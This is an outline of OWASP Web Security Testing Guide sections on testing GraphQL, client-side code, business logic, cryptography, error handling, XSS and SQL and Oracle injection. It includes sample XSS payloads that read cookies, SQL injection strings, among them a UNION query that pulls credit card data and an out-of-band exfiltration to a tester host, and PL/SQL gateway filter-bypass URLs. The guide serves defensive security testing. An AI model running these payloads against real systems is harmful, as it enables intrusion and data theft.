-
4.12 API Testing
-
Testing GraphQL
-
Objectives
- Assess that a secure and production-ready configuration is deployed.
- Validate all input fields against generic attacks.
- Ensure that proper access controls are applied.
-
How to Test
-
Introspection Queries
- Using Native GraphQL Introspection
- Using GraphiQL
- Using GraphQL Playground
- Introspection Conclusion
- Authorization
- Injection
- SQL Injection
- Cross-Site Scripting (XSS)
- Denial of Service (DoS) Queries
- Batching Attacks
- Detailed Error Message
- Exposure of Underlying API
-
Remediation
- Restrict access to introspection queries.
- Implement input validation.
- Implement security measures to prevent abusive queries.
- Send generic error messages: use generic error messages that do not reveal details of the deployment.
- Mitigate batching attacks
-
Tools
- GraphQL Playground
- GraphQL Voyager
- sqlmap
- InQL (Burp Extension)
- GraphQL Raider (Burp Extension)
- GraphQL (Add-on for OWASP ZAP)
-
References
- poc-graphql
- GraphQL Official Site
- Howtographql - Security
- GraphQL Constraint Directive
- Client-side Testing (XSS and other vulnerabilities)
- 5 Common GraphQL Security Vulnerabilities
- GraphQL common vulnerabilities and how to exploit them
- GraphQL CS
-
4.11 Client-Side Testing
-
Testing for DOM-Based Cross Site Scripting
-
Objectives
- Identify DOM sinks.
- Build payloads that pertain to every sink type.
-
How to Test
- Input written to the page by the server in a way that does not allow direct XSS, and
- Input obtained from client-side JavaScript objects.
- URL using the document and location attributes
-
Remediation
- the DOM-based XSS Prevention Cheat Sheet.
-
References
- DomXSSWiki
- DOM XSS article by Amit Klein
-
Testing for JavaScript Execution
-
Objectives
- Identify sinks and possible JavaScript injection points.
-
How to Test
- Consider the following: DOM XSS exercise
-
Testing for HTML Injection
-
Objectives
- Identify HTML injection points and assess the severity of the injected content.
-
How to Test
- Consider the following DOM XSS exercise
-
Testing for Client-side URL Redirect
-
Objectives
- Identify injection points that handle URLs or paths.
- Assess the locations that the system could redirect to.
-
How to Test
- These redirections may be implemented, to give a JavaScript example, using the window.location object. This can be used to direct the browser to another page by simply assigning a string to it.
-
Testing for CSS Injection
-
Objectives
- Identify CSS injection points.
- Assess the impact of the injection.
-
How to Test
- Code should be analyzed to determine if a user is permitted to inject content in the CSS context.
- Particularly, the way in which the website returns CSS rules on the basis of the inputs should be inspected.
- Password “cracker” via CSS and HTML5
- CSS attribute reading
- JavaScript based attacks using CSSStyleDeclaration with unescaped input
-
Testing for Client-side Resource Manipulation
-
Objectives
- Identify sinks with weak input validation.
- Assess the impact of the resource manipulation.
-
How to Test
- To manually check for this type of vulnerability, we must identify whether the application employs inputs without correctly validating them.
- Frame
iframe
src
- Link
a
href
- AJAX Request
xhr.open(method, [url], true);
URL
- CSS
link
href
- Image
img
src
- Object
object
data
- Script
script
src
-
Testing Cross Origin Resource Sharing
-
Objectives
- Identify endpoints that implement CORS.
- Ensure that the CORS configuration is secure or harmless.
-
How to Test
- A tool such as ZAP can enable testers to intercept HTTP headers, which can reveal how CORS is used.
-
Testing for Cross Site Flashing
-
Objectives
- Decompile and analyze the application’s code.
- Assess sinks inputs and unsafe method usages.
-
How to Test
- Decompilation
- Undefined Variables FlashVars
-
Unsafe Methods
- loadVariables()
- loadMovie()
- getURL()
- loadMovie()
- loadMovieNum()
- FScrollPane.loadScrollContent()
- LoadVars.load
- LoadVars.send
- XML.load ( 'url' )
- LoadVars.load ( 'url' )
- Sound.loadSound( 'url' , isStreaming );
- NetStream.play( 'url' );
- flash.external.ExternalInterface.call(_root.callback)
- htmlText
- Exploitation by Reflected XSS
- GetURL (AS2) / NavigateToURL (AS3)
- Using `asfunction`
- ExternalInterface
- HTML Injection
-
Tools
- Adobe SWF Investigator
- OWASP SWFIntruder
- Decompiler – Flare
- Disassembler – Flasm
- Swfmill – Convert Swf to XML and vice versa
-
Testing for Clickjacking
-
Objectives
- Understand security measures in place.
- Assess how strict the security measures are and if they are bypassable.
-
How to Test
-
Bypass Clickjacking Protection
- Client-side Protection: Frame Busting
- Mobile Website Version
- Double Framing
- Disabling JavaScript
- OnBeforeUnload Event
- XSS Filter
- Redefining Location
-
Server-side Protection: X-Frame-Options
- Browser Compatibility
- Proxies
- Mobile Website Version
-
References
- OWASP Clickjacking
- Wikipedia Clickjacking
- Context Information Security: “Next Generation Clickjacking”
- Gustav Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson: “Busting Frame Busting: a Study of Clickjacking
- Paul Stone: “Next generation clickjacking”
-
Testing WebSockets
-
Objectives
- Identify the usage of WebSockets.
- Assess its implementation by using the same tests on normal HTTP channels.
-
How to Test
-
Black-Box Testing
- 1. Identify that the application is using WebSockets.
- Inspect the client-side source code for the ws:// or wss:// URI scheme.
- Use Google Chrome’s Developer Tools to view the Network WebSocket communication.
- Use ZAP’s WebSocket tab.
- 2. Origin
- Using a WebSocket client (one can be found in the Tools section below) attempt to connect to the remote WebSocket server. If a connection is established the server may not be checking the origin header of the WebSocket handshake
- 3. Confidentiality and Integrity.
- Check that the WebSocket connection is using SSL to transport sensitive information wss:// .
- Check the SSL Implementation for security issues (Valid Certificate, BEAST, CRIME, RC4, etc).
- 4. Authentication.
- WebSockets do not handle authentication, normal black-box authentication tests should be carried out
- 5. Authorization.
- WebSockets do not handle authorization, normal black-box authorization tests should be carried out.
- 6. Input Sanitization.
- Use ZAP’s WebSocket tab to replay and fuzz WebSocket request and responses.
-
Tools
- OWASP Zed Attack Proxy (ZAP)
- WebSocket Client
- Google Chrome Simple WebSocket Client
-
References
- HTML5 Rocks - Introducing WebSockets: Bringing Sockets to the Web
- W3C - The WebSocket API
- IETF - The WebSocket Protocol
- Christian Schneider - Cross-Site WebSocket Hijacking (CSWSH)
- Jussi-Pekka Erkkilä - WebSocket Security Analysis (PDF)
- Robert Koch- On WebSockets in Penetration Testing
- DigiNinja - OWASP ZAP and Web Sockets
-
Testing Web Messaging
-
Objectives
- Assess the security of the message’s origin.
- Validate that it’s using safe methods and validating its input.
-
How to Test
- Examine Origin Security
- Examine Input Validation
- Static Code Analysis
-
Testing Browser Storage
-
Objectives
- Determine whether the website is storing sensitive data in client-side storage.
- The code handling of the storage objects should be examined for possibilities of injection attacks,
-
How to Test
-
Local Storage
- window.localStorage is a global property that implements the Web Storage API
- List All Key-Value Entries
-
Session Storage
- window.sessionStorage is a global property that implements the Web Storage API
- List All Key-Value Entries
-
IndexedDB
- ndexedDB is a transactional, object-oriented database intended for structured data.
- Print All the Contents of IndexedDB
-
Web SQL
- Web SQL is deprecated since November 18, 2010 and it’s recommended that web developers do not use it
- Cookies
- Global Window Object
-
Attack Chain
- Following the identification any of the above attack vectors, an attack chain can be formed with different types of client�side attacks, such as DOM based XSS attacks
-
Remediation
- Applications should be storing sensitive data on the server-side, and not on the client-side, in a secured manner following best practices.
-
References
- Local Storage
- Session Storage
- IndexedDB
- Web Crypto API: Key Storage
- Web SQL
- Cookies
-
Testing for Cross Site Script Inclusion
-
Objectives
- Locate sensitive data across the system.
- Assess the leakage of sensitive data through various techniques.
-
How to Test
- Collect Data Using Authenticated and Unauthenticated User Sessions
-
Determine Whether the Sensitive Data Can Be Leaked Using JavaScript
- 1. Global variables
- 2. Global function parameters
- 3. CSV (Comma Separated Values) with quotations theft
- 4. JavaScript runtime errors
- 5. Prototype chaining using this
- 1. Sensitive Data Leakage via Global Variables
- 2. Sensitive Data Leakage via Global Function Parameters
- 3. Sensitive Data Leakage via CSV with Quotations Theft
- 4. Sensitive Data Leakage via JavaScript Runtime Errors
- 5. Sensitive Data Leakage via Prototype Chaining Using `this`
-
4.10 Business Logic Testing
-
Introduction to Business Logic
- Testing for business logic flaws in a multi-functional dynamic web application requires thinking in unconventional methods
- The classification of business logic flaws has been under-studied; although exploitation of business flaws frequently happens in real-world systems
- Testing of business logic flaws is similar to the test types used by functional testers that focus on logical or finite state testing.
-
Tools
-
Intercepting Proxy
- OWASP Zed Attack Proxy
- Burp Proxy
-
Web Browser Plug-ins
- Tamper Data for FF Quantum
- Tamper Chrome (for Google Chrome)
-
Miscellaneous Test Tools
- Web Developer toolbar
- HTTP Request Maker for Chrome
- HTTP Request Maker for Firefox
- Cookie Editor for Chrome
- Cookie Editor for Firefox
-
Useful Web Sites
- Abuse of Functionality
- Business logic
- Business Logic Flaws and Yahoo Games
- CWE-840: Business Logic Errors
- Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic
- Software Testing Lifecycle
-
Books
- The Decision Model: A Business Logic Framework Linking Business and Technology
-
Test Business Logic Data Validation
-
Objectives
- Identify data injection points.
- Validate that all checks are occurring on the back end and can’t be bypassed.
- Attempt to break the format of the expected data and analyze how the application is handling it.
-
How to Test
-
Generic Test Method
- Review the project documentation and use exploratory testing looking for data entry points
- Once found try to insert logically invalid data into the application/system.
- Perform front-end GUI Functional Valid testing on the application to ensure that the only “valid” values are accepted.
- Using an intercepting proxy observe the HTTP POST/GET looking for places that variables
- Once variables are found start interrogating the field with logically “invalid” data
-
Related Test Cases
- All Input Validation test cases.
- Testing for Account Enumeration and Guessable User Account.
- Testing for Bypassing Session Management Schema.
- Testing for Exposed Session Variables.
-
Tools
- OWASP Zed Attack Proxy (ZAP)
- Burp Suite
-
References
- OWASP Proactive Controls (C5) - Validate All Inputs
- OWASP Cheatsheet Series - Input_Validation_Cheat_Sheet
-
Test Ability to Forge Requests
-
Objectives
- Review the project documentation looking for guessable, predictable, or hidden functionality of fields.
- Insert logically valid data in order to bypass normal business logic workflow.
-
How to Test
-
Through Identifying Guessable Values
- Using an intercepting proxy observe the HTTP POST/GET looking for some indication that values are incrementing
- If it is found that some value is guessable this value may be changed and one may gain unexpected visibilit
-
Through Identifying Hidden Options
- Using an intercepting proxy observe the HTTP POST/GET looking for some indication of hidden features
- If any are found try to guess and change these values to get a different application response or behavior
-
Related Test Cases
- Testing for Exposed Session Variables
- Testing for Cross Site Request Forgery (CSRF)
- Testing for Account Enumeration and Guessable User Account
-
Tools
- OWASP Zed Attack Proxy (ZAP)
- Burp Suite
-
References
- Cross Site Request Forgery - Legitimizing Forged Requests
- Easter egg
- Top 10 Software Easter Eggs
-
Test Integrity Checks
-
Objectives
- Review the project documentation for components of the system that move, store, or handle data.
- Determine what type of data is logically acceptable by the component and what types the system should guard against.
- Determine who should be allowed to modify or read that data in each component.
- Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.
-
How to Test
-
Specific Testing Method 1
- Using a proxy capture HTTP traffic looking for hidden fields.
- If a hidden field is found see how these fields compare with the GUI application and start interrogating this value
-
Specific Testing Method 2
- Using a proxy capture HTTP traffic looking for a place to insert information into areas of the application that are non-editable.
- If it is found see how these fields compare with the GUI application and start interrogating this value through the proxy by submitting different data values
-
Specific Testing Method 3
- ist components of the application or system that could be impacted, for example logs or databases.
- For each component identified, try to read, edit or remove its information.
-
Related Test Cases
- All Input Validation test cases.
-
Tools
- Various system/application tools such as editors and file manipulation tools.
- OWASP Zed Attack Proxy (ZAP)
- Burp Suite
-
References
- Implementing Referential Integrity and Shared Business Logic in a RDB
- On Rules and Integrity Constraints in Database Systems
- Use referential integrity to enforce basic business rules in Oracle
- Maximizing Business Logic Reuse with Reactive Logic
- Tamper Evidence Logging
-
Test for Process Timing
-
Objectives
- Review the project documentation for system functionality that may be impacted by time.
- Develop and execute misuse cases.
-
How to Test
- The tester should identify which processes are dependent on time, whether it was a window for a task to be completed,
- Following that, it is best to automate the requests that will abuse the above discovered processes
- The tester should draw a diagram of how the process flows, the injection points, and prepare the requests before hand to launch them at the vulnerable processes
-
Related Test Cases
- Testing for Cookies Attributes
- Test Session Timeout
-
Test Number of Times a Function Can Be Used Limits
-
Objectives
- Identify functions that must set limits to the times they can be called.
- Assess if there is a logical limit set on the functions and if it is properly validated.
-
How to Test
- Review the project documentation and use exploratory testing looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
- For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times
-
Related Test Cases
- Testing for Account Enumeration and Guessable User Account
- Testing for Weak lock out mechanism
-
References
- InfoPath Forms Services business logic exceeded the maximum limit of operations Rule
- Gold Trading Was Temporarily Halted On The CME This Morning
-
Testing for the Circumvention of Work Flows
-
Objectives
- Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow.
- Develop a misuse case and try to circumvent every logic flow identified.
-
How to Test
-
Testing Method 1
- Start a transaction going through the application past the points that triggers credits/points to the users account.
- Cancel out of the transaction or reduce the final tender so that the point values should be decreased
-
Testing Method 2
- On a content management or bulletin board system enter and save valid initial text or values.
- Then try to append, edit and remove data that would leave the existing data in an invalid state or with invalid values to ensure that the user is not allowed to save the incorrect information
-
Related Test Cases
- Testing Directory Traversal/File Include
- Testing for Bypassing Authorization Schema
- Testing for Bypassing Session Management Schema
- Test Business Logic Data Validation
- Test Ability to Forge Requests
- Test Integrity Checks
- Test for Process Timing
- Test Number of Times a Function Can be Used Limits
- Test Defenses Against Application Mis-use
- Test Upload of Unexpected File Types
- Test Upload of Malicious Files
-
References
- OWASP Abuse Case Cheat Sheet
- CWE-840: Business Logic Errors
-
Test Defenses Against Application Misuse
-
Objectives
- Generate notes from all tests conducted against the system.
- Review which tests had a different functionality based on aggressive input.
- Understand the defenses in place and verify if they are enough to protect the system
-
How to Test
- Changed responses
- Blocked requests
- Actions that log a user out or lock their account
- Rejecting input containing certain characters
- Locking out an account temporarily after a number of authentication failures
- Forced browsing
- Bypassing presentation layer input validation
- Multiple access control errors
- Additional, duplicated or missing parameter names
- Multiple input validation or business logic verification failures with values that cannot be the result user mistakes or typos
- Structured data (e.g. JSON, XML) of an invalid format is received
- Blatant cross-site scripting or SQL injection payloads are received
- Utilizing the application faster than would be possible without automation tools
- Change in continental geo-location of a user
- Change of user agent
- Accessing a multi-stage business process in the wrong order
- Large number of, or high rate of use of, application-specific functionality
-
Related Test Cases
- All other test cases are relevant.
-
References
- Resilient Software, Software Assurance, US Department Homeland Security
- IR 7684 Common Misuse Scoring System (CMSS), NIST
- Common Attack Pattern Enumeration and Classification (CAPEC), The Mitre Corporation
- OWASP AppSensor Project
- AppSensor Guide v2, OWASP
- Watson C, Coates M, Melton J and Groves G, Creating Attack-Aware Software Applications with Real-Time Defenses
-
Test Upload of Unexpected File Types
-
Objectives
- Review the project documentation for file types that are rejected by the system.
- Verify that the unwelcomed file types are rejected and handled safely.
- Verify that file batch uploads are secure and do not allow any bypass against the set security measures.
-
How to Test
-
Specific Testing Method
- Study the applications logical requirements.
- Prepare a library of files that are “not approved” for upload that may contain files such as: jsp, exe, or HTML files containing script.
- In the application navigate to the file submission or upload mechanism.
- Submit the “not approved” file for upload and verify that they are properly prevented from uploading
- Check if the website only do file type check in client-side JavaScript
- Check if the website only check the file type by “Content-Type” in HTTP request.
- Check if the website only check by the file extension.
- Check if other uploaded files can be accessed directly by specified URL.
- Check if the uploaded file can include code or script injection.
- Check if there is any file path checking for uploaded files.
-
Related Test Cases
- Test File Extensions Handling for Sensitive Information
- Test Upload of Malicious Files
-
References
- OWASP - Unrestricted File Upload
- File upload security best practices: Block a malicious file upload
- Stop people uploading malicious PHP files via forms
- CWE-434: Unrestricted Upload of File with Dangerous Type
-
Test Upload of Malicious Files
-
Objectives
- Identify the file upload functionality.
- Review the project documentation to identify what file types are considered acceptable
- Determine how the uploaded files are processed.
- Obtain or create a set of malicious files for testing.
- Try to upload the malicious files to the application and determine whether it is accepted and processed.
-
How to Test
-
Malicious File Types
- Web Shells
- Filter Evasion
-
Malicious File Contents
- Malware
- Archive Directory Traversal
- Zip Bombs
- XML Files
- CSV files may allow CSV injection attacks.
- Office files may contain malicious macros or PowerShell code.
- PDFs may contain malicious JavaScript
-
Source Code Review
- Java: new file , import , upload , getFileName , Download , getOutputString
- C/C++: open , fopen
- PHP: move_uploaded_file() , Readfile , file_put_contents() , file() , parse_ini_file() , copy() , fopen() , include() , require()
-
Related Test Cases
- Test File Extensions Handling for Sensitive Information
- Testing for XML Injection
- Test Upload of Unexpected File Types
-
Tools
- Metasploit’s payload generation functionality
- Intercepting proxy
-
References
- OWASP - File Upload Cheat Sheet
- OWASP - Unrestricted File Upload
- Why File Upload Forms are a Major Security Threat
- Overview of Malicious File Upload Attacks
- 8 Basic Rules to Implement Secure File Uploads
- Stop people uploading malicious PHP files via forms
- How to Tell if a File is Malicious
- CWE-434: Unrestricted Upload of File with Dangerous Type
- Implementing Secure File Upload
- Metasploit Generating Payloads
-
4.9 Testing for Weak Cryptography
-
Testing for Weak Transport Layer Security
-
Objectives
- Validate the service configuration.
- Review the digital certificate’s cryptographic strength and validity.
- Ensure that the TLS security is not bypassable and is properly implemented across the application.
-
How to Test
-
Server Configuration
- SSLv2 (DROWN)
- SSLv3 (POODLE)
- TLSv1.0 (BEAST)
- EXPORT ciphers suites (FREAK)
- NULL ciphers (they only provide authentication).
- Anonymous ciphers (these may be supported on SMTP servers, as discussed in RFC 7672)
- RC4 ciphers (NOMORE)
- CBC mode ciphers (BEAST, Lucky 13)
- TLS compression (CRIME)
- Weak DHE keys (LOGJAM)
-
Digital Certificates
- Cryptographic Weaknesses
- The key strength should be at least 2048 bits.
- The signature algorithm should be at least SHA-256. Legacy algorithms such as MD5 and SHA-1 should not be
- used.
- Validity
- Be within the defined validity period.
- Be signed by a trusted certificate authority (CA).
- Have a Subject Alternate Name (SAN) that matches the hostname of the system.
-
Implementation Vulnerabilities
- Debian OpenSSL Predictable Random Number Generator (CVE-2008-0166)
- OpenSSL Insecure Renegotiation (CVE-2009-3555)
- OpenSSL Heartbleed (CVE-2014-0160)
- F5 TLS POODLE (CVE-2014-8730)
- Microsoft Schannel Denial of Service (MS14-066 / CVE CVE-2014-6321)
-
Application Vulnerabilities
- Not sending sensitive data over unencrypted channels (WSTG-CRYP-03)
- Setting the HTTP Strict-Transport-Security header (WSTG-CONF-07)
- Setting the Secure flag on cookies (WSTG-SESS-02)
-
Automated Testing
- Nmap (various scripts)
- OWASP O-Saft
- sslscan
- sslyze
- SSL Labs
- testssl.sh
-
Manual Testing
- It is also possible to carry out most checks manually, using command-line looks such as openssl s_client or gnutls-cli to connect with specific protocols, ciphers or options.
-
References
- OWASP Transport Layer Protection Cheat Sheet
- Mozilla Server Side TLS Guide
-
Testing for Padding Oracle
-
Objectives
- Identify encrypted messages that rely on padding.
- Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.
-
How to Test
-
Black-Box Testing
- 1. The data is encrypted. Good candidates are values which appear to be random
- 2. A block cipher is used.
-
Gray-Box Testing
- 1. The integrity of the cipher text should be verified by a secure mechanism, like HMAC or authenticated cipher operation modes like GCM or CCM.
- 2. All error states while decryption and further processing are handled uniformly.
-
Tools
- PadBuster
- Padding Oracle Exploitation Tool (POET)
- Poracle
- python-paddingoracle
-
References
- Wikepedia - Padding Oracle Attack
- Juliano Rizzo, Thai Duong, “Practical Padding Oracle Attacks”
-
Testing for Sensitive Information Sent via Unencrypted Channels
-
Objectives
- Identify sensitive information transmitted through the various channels.
- Assess the privacy and security of the channels used.
-
How to Test
- OWASP Top 10 2017 A3-Sensitive Data Exposure
- Transport Layer Protection Cheat Sheet.
- Example 1: Basic Authentication over HTTP
- Example 2: Form-Based Authentication Performed over HTTP
- Example 3: Cookie Containing Session ID Sent over HTTP
- Example 4: Testing Password Sensitive Information in Source Code or Logs
-
Tools
- curl
- grep
- Identity Finder
- Wireshark
- TCPDUMP
-
Testing for Weak Encryption
-
Objectives
- Provide a guideline for the identification weak encryption or hashing uses and implementations.
-
How to Test
- Basic Security Checklist
-
Source Code Review
- Search for the following keywords to identify use of weak algorithms: MD4, MD5, RC4, RC2, DES, Blowfish, SHA�1, ECB
- For Java implementations, the following API is related to encryption. Review the parameters of the encryption implementation.
- For RSA encryption, the following padding modes are suggested.
- Search for ECB , it’s not allowed to be used in padding.
- Review if different IV (initial Vector) is used.
- Search for IvParameterSpec , check if the IV value is generated differently and randomly.
- In Java, search for MessageDigest to check if weak hash algorithm (MD5 or CRC) is used.
- For signature, SHA1 and MD5 should not be used.
- Search for PBKDF2 .
- Hard-coded sensitive information
-
Tools
- Vulnerability scanners such as Nessus, NMAP (scripts), or OpenVAS
- Use static code analysis tool to do source code review such as klocwork, Fortify, Coverity, CheckMark
-
References
- NIST FIPS Standards
- Wikipedia: Initialization Vector
- Secure Coding - Generating Strong Random Numbers
- Optimal Asymmetric Encryption Padding
- Cryptographic Storage Cheat Sheet
- Password Storage Cheat Sheet
- Secure Coding - Do not use insecure or weak cryptographic algorithms
- Insecure Randomness
- Insufficient Entropy
- Insufficient Session-ID Length
- Using a broken or risky cryptographic algorithm
- Javax.crypto.cipher API
- ISO 18033-1:2015 – Encryption Algorithms
- ISO 18033-2:2015 – Asymmetric Ciphers
- ISO 18033-3:2015 – Block Ciphers
-
4.8 Testing for Error Handling
-
Testing for Improper Error Handling
-
Objectives
- Identify existing error output.
- Analyze the different output returned.
-
How to Test
-
Web Servers
- Search for random files and folders that will not be found (404s).
- Try to request folders that exist and see the server behavior (403s, blank page, or directory listing).
- Try sending a request that breaks the HTTP RFC. One example would be to send a very large path, break the
- headers format, or change the HTTP version.
-
Applications
- 1. Identify possible input points where the application is expecting data.
- 2. Analyse the expected input type (strings, integers, JSON, XML, etc.).
- 3. Fuzz every input point based on the previous steps to have a more focused test scenario.
- 4. Understand the service responding with the error message and try to make a more refined fuzz list to bring out
-
Remediation
- Proactive Controls C10
- Error Handling Cheat Sheet.
-
Playgrounds
- Juice Shop - Error Handling
-
References
- WSTG: Appendix C - Fuzz Vectors
- Proactive Controls C10: Handle All Errors and Exceptions
- ASVS v4.1 v7.4: Error handling
- CWE 728 - Improper Error Handling
- Cheat Sheet Series: Error Handling
-
4.7 Input Validation Testing
-
Reflected Cross Site Scripting
-
Objectives
- Identify variables that are reflected in responses
- Assess the input they accept and the encoding that gets applied on return
-
How to Test
-
Black-Box Testing
- Detect Input Vectors
- This includes hidden or non-obvious inputs such as HTTP parameters, POST data, hidden form field
values, and predefined radio or selection values.
- Analyze Input Vectors
- Analyze each input vector to detect potential vulnerabilities.
- <script>alert(123)</script>
- "><script>alert(document.cookie)</script>
- XSS Filter Evasion Cheat Sheet.
- Check Impact
- For each test input attempted in the previous phase, the tester will analyze the result and determine if it represents a
vulnerability that has a realistic impact on the web application’s security
- Bypass XSS Filters
- the majority of XSS prevention must depend on the web application’s sanitization of untrusted user input.
-
Gray-Box Testing
- If source code is available, all variables received from users should be analyzed.
-
Tools
- PHP Charset Encoder(PCE)
- Hackvertor
- XSS-Proxy
- ratproxy
- Burp Proxy
- OWASP Zed Attack Proxy
-
References
- XSS Filter Evasion Cheat Sheet
-
Books
- “Hacking Exposed Web Applications”
- “The Web Application’s Handbook"
- “Cross Site Scripting Attacks: XSS Exploits and Defense”
-
Whitepapers
- CERT - Malicious HTML Tags Embedded in Client Web Requests
- cgisecurity.com - The Cross Site Scripting FAQ
- G.Ollmann - HTML Code Injection and Cross-site scripting
- Understanding the Web browser threat
-
Stored Cross Site Scripting
-
Objectives
- Identify stored input that is reflected on the client-side.
- Assess the input they accept and the encoding that gets applied on return
-
How to Test
-
Black-Box Testing
- Input Forms
- User/Profiles page
- Shopping cart
- File Manager
- Application settings/preferences
- Forum/Message board
- Blog
- Log
- Analyze HTML Code
- Input stored by the application is normally used in HTML tags, but it can also be found as part of JavaScript content.
- File Upload
- XSS payload can be injected in the file uploaded.
-
Gray-Box Testing
- Use front-end application and enter input with special/invalid characters
- Analyze application response(s)
- Identify presence of input validation controls
- Access back-end system and check if input is stored and how it is stored
- Analyze source code and understand how stored input is rendered by the application
-
Tools
- PHP Charset Encoder(PCE)
- Hackvertor
- BeEF
- XSS-Proxy
- Burp Proxy
- XSS Assistant
- OWASP Zed Attack Proxy (ZAP)
-
References
- XSS Filter Evasion Cheat Sheet
-
Books
- “Hacking Exposed Web Applications”
- “The Web Application’s Handbook"
- “Cross Site Scripting Attacks: XSS Exploits and Defense”
-
Whitepapers
- CERT - Malicious HTML Tags Embedded in Client Web Requests
- Amit Klein: “Cross-site Scripting Explained”
- Gunter Ollmann: “HTML Code Injection and Cross-site Scripting”
- CGISecurity.com: “The Cross Site Scripting FAQ”
-
HTTP Parameter Pollution
-
Objectives
- Identify the backend and the parsing method used.
- Assess injection points and try bypassing input filters using HPP.
-
How to Test
-
Server-Side HPP
- Submit an HTTP request containing the standard parameter name and value,
- . Replace the parameter value with a tampered value
- Send a new request combining step (1) and (2). Again
- Compare the responses obtained during all previous steps.
-
Client-Side HPP
- Similarly to server-side HPP, pollute each HTTP parameter with %26HPP_TEST and look for url-decoded occurrences of
-
Tools
- OWASP ZAP Passive/Active Scanners
-
References
- HTTP Parameter Pollution - Luca Carettoni, Stefano di Paola
- Client-side HTTP Parameter Pollution Example (Yahoo! Classic Mail flaw) - Stefano di Paola
- How to Detect HTTP Parameter Pollution Attacks - Chrysostomos Daniel
- CAPEC-460: HTTP Parameter Pollution (HPP) - Evgeny Lebanidze
- Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications
-
Testing for SQL Injection
-
Objectives
- Identify SQL injection points.
- Assess the severity of the injection and the level of access that can be achieved through it.
-
How to Test
-
Detection Techniques
- Authentication forms
- Search engines
- E-Commerce sites
- first test usually consists of adding a single quote ' or a semicolon ; to the field or parameter
- Also comment delimiters ( -- or /* */ , etc)
-
Standard SQL Injection Testing
- Classic SQL Injection
- SELECT * FROM Users WHERE Username='$username' AND Password='$password'
- $username = 1' or '1' = '1
- $password = 1' or '1' = '1
- SELECT * FROM products WHERE id_product=$id_product
- http://www.example.com/product.php?id=10
- http://www.example.com/product.php?id=10 AND 1=1
- Stacked Queries
- SELECT * FROM products WHERE id_product=$id_product
- http://www.example.com/product.php?id=10; INSERT INTO users (…)
-
Fingerprinting the Database
- Errors Returned by the Application
- MySql
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
- Oracle
- ORA-00933: SQL command not properly ended
- MS SQL Server
- Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string
- PostgreSQL
- Query failed: ERROR: syntax error at or near "’" at character 56 in /www/site/test.php on line 121.
-
Exploitation Techniques
- Union Exploitation Technique
- SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
- http://www.example.com/product.php?id=10 ORDER BY 10--
- Determining the number of the columns
- http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--
- Determining the columns containing integers
- http://www.example.com/product.php?id=10 UNION SELECT 1,1,null--
- Boolean Exploitation Technique
- http://www.example.com/index.php?id=1'
- Error Based Exploitation Technique
- http://www.example.com/product.php?id=10
- http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--
- Out of Band Exploitation Technique
- http://www.example.com/product.php?id=10
- http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--
- Time Delay Exploitation Technique
- http://www.example.com/product.php?id=10
- http://www.example.com/product.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--
- Stored Procedure Injection
-
SQL Injection Signature Evasion Techniques
- Whitespace
- Null Bytes
- SQL Comments
- URL Encoding
- Character Encoding
- String Concatenation
- Hex Encoding
- Declare Variables
- Alternative Expression of 'or 1 = 1'
-
Remediation
- SQL Injection Prevention CheatSheet.
- Database Security CheatSheet.
- Input Validation CheatSheet.
-
Tools
- SQL Injection Fuzz Strings
- sqlbftools
- Bernardo Damele A. G.: sqlmap, automatic SQL injection tool
- Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool
-
References
- Top 10 2017-A1-Injection
- SQL Injection
- Oracle
- MySQL
- SQL Server
- PostgreSQL
- MS Access
- NoSQL
- ORM
- Client-side
-
Whitepapers
- Victor Chapela: “Advanced SQL Injection”
- Chris Anley: “More Advanced SQL Injection”
- David Litchfield: “Data-mining with SQL Injection and Inference”
- Imperva: “Blinded SQL Injection”
- Ferruh Mavituna: “SQL Injection Cheat Sheet”
- Kevin Spett from SPI Dynamics: “SQL Injection”
- Kevin Spett from SPI Dynamics: “Blind SQL Injection”
- “ZeQ3uL” (Prathan Phongthiproek) and “Suphot Boonchamnan”: “Beyond SQLi: Obfuscate and Bypass”
- Adi Kaploun and Eliran Goshen, Check Point Threat Intelligence & Research Team: “The Latest SQL Injection
-
Testing for Oracle
-
How to Test
-
How the PL/SQL Gateway Works
- 1. The web server accepts a request from a web client and determines if it should be processed by the PL/SQL gateway
- 2. The PL/SQL Gateway processes the request by extracting the requested package name, procedure, and variables.
- 3. The requested package and procedure are wrapped in a block of anonymous PL/SQL, and sent to the database server
- 4. The database server executes the procedure and sends the results back to the Gateway as HTML.
- 5. The gateway sends the response, via the web server, back to the client.
- Determining if the PL/SQL Gateway is Running
- Server Response Headers
- The NULL Test
- http://www.example.com/pls/dad/null
- Known Package Access
- Accessing Arbitrary PL/SQL Packages in the Database
-
Bypassing the Exclusion List - Method 1
- http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC
- http://www.example.com/pls/dad/%20SYS.PACKAGE.PROC
- http://www.example.com/pls/dad/%09SYS.PACKAGE.PROC
-
Bypassing the Exclusion List - Method 2
- http://www.example.com/pls/dad/<<LBL>>SYS.PACKAGE.PROC
-
Bypassing the Exclusion List - Method 3
- http://www.example.com/pls/dad/"SYS".PACKAGE.PROC
-
Bypassing the Exclusion List - Method 4
- w.example.com/pls/dad/S%FFS.PACKAGE.PROC http://www.example.com/pls/dad/S%AFS.PACKAGE.PROC
-
Bypassing the Exclusion List - Method 5
- http://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC
-
Bypassing the Exclusion List - Method 6
- http://www.example.com/pls/dad/foo.bar?xyz=123
- Assessing Custom PL/SQL Web Applications
-
Tools
- Orascan
-
References
